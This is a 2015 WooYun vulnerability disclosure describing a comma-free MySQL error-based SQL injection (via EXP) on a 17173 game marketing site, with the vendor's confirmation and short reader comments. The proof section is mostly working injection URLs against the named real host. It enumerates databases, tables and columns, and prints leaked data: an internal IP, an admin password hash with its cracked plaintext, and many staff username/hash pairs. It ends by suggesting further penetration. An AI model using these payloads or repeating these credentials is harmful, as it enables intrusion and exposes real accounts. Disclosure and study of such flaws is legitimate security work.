当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099907

漏洞标题:17173游戏某站点MySQL报错注入(不带逗号注入的猜解过程)

相关厂商:17173游戏

漏洞作者: lijiejie

提交时间:2015-03-06 18:53

修复时间:2015-04-20 18:54

公开时间:2015-04-20 18:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-08: 厂商已经确认,细节仅向厂商公开
2015-03-18: 细节向核心白帽子及相关领域专家公开
2015-03-28: 细节向普通白帽子公开
2015-04-07: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

17173游戏某站点MySQL报错注入(不带逗号的报错)

详细说明:

updateXML,duplicate entry报错注入,都需要使用到逗号。
那如果逗号被作为分隔符或者是过滤了呢?
可以用exp函数报错! Ref: http://zone.wooyun.org/content/18890

漏洞证明:

http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20user())a))%2b%22bb&t=1425612949962


17173.mysqli.png


user: act_admin@10.59.107.127


进一步,猜数据库:

http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20group_concat(schema_name)%20from%20INFORMATION_SCHEMA.SCHEMATA)a))%2b%22bb&t=1425612949962


得到:

information_schema
act_auto
act_os_2013
act_os_2014
act_os_2015
activity2010
activity2011
activity2012
activity2013
activity2014
activity2015
activity_manage


查看activity_manage库中的数据表:

http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27activity_manage%27)a))%2b%22bb&t=1425612949962


得到:

activities
activity_classify
activity_comment
activity_function
activity_join
activity_joinrecord
activity_log
activity_right
users


再取users表的所有列:

http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)a))%2b%22bb&t=1425612949962


user_id
username
passwd
group_id
note
adminid


接着猜解username,password,可以得到admin的密码是 f00e61dc5e9caadbb3a57fbd95f5f0bd,破解得到 actadmin!@#$%^

admin      f00e61dc5e9caadbb3a57fbd95f5f0bd
LC0391    670b14728ad9902aecba32e22fa4f6bd
LC0095    10334eb58085ce713fd970a1461d8e77
wuhong   6cdb4956e4eb4d0d8495c6a98eff0f94
lc0630     61ec7506bcbaf614f7fec0cbe9b0bada
LC0176   c2d542de924e4b22f77da80267632207
LC0059   81fa32c3d5abab6076250a9d75354f40
LC0068   69cfc91a0131c110096724a22b63f166
lc0499    91ce6699aa98b0b8692914f3eb4010ba
LC0067   93012eeab6bdf052b4e988aa1606da31
LC0561   670b14728ad9902aecba32e22fa4f6bd
LC0805   3d822f2886a31d2a0b5a7929c67c87ff
LC0921   63998412bb2c639038ebc2fb4f246873
LC0031   84e40b55f1e936075b2afc18c27d8fd8


因为报错限制了文本的长度,一次获取不全,需要使用limit 10 offset 10这样的格式分片后,10行10行地输出,上面只是部分内容。不需要逗号,比如:

select group_concat(passwd) from activity_manage.users limit 10 offset 0)a


测试到此为止,我们已经可以获取数据库中所有的内容了,可以查找进入后台,利用邮箱进行破解等后续渗透。

修复方案:

参数过滤和转义,特别是双引号

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-08 21:33

厂商回复:

感谢支持和关注!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-06 19:34 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    叼!

  2. 2015-03-06 19:41 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    附带测试脚本...

  3. 2015-03-06 19:57 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    李姐姐

  4. 2015-04-07 23:15 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    叼、

  5. 2015-04-21 09:13 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    姐姐就是叼

  6. 2015-04-22 11:23 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    http://www.w3resource.com/sql/arithmetic-functions/exp.php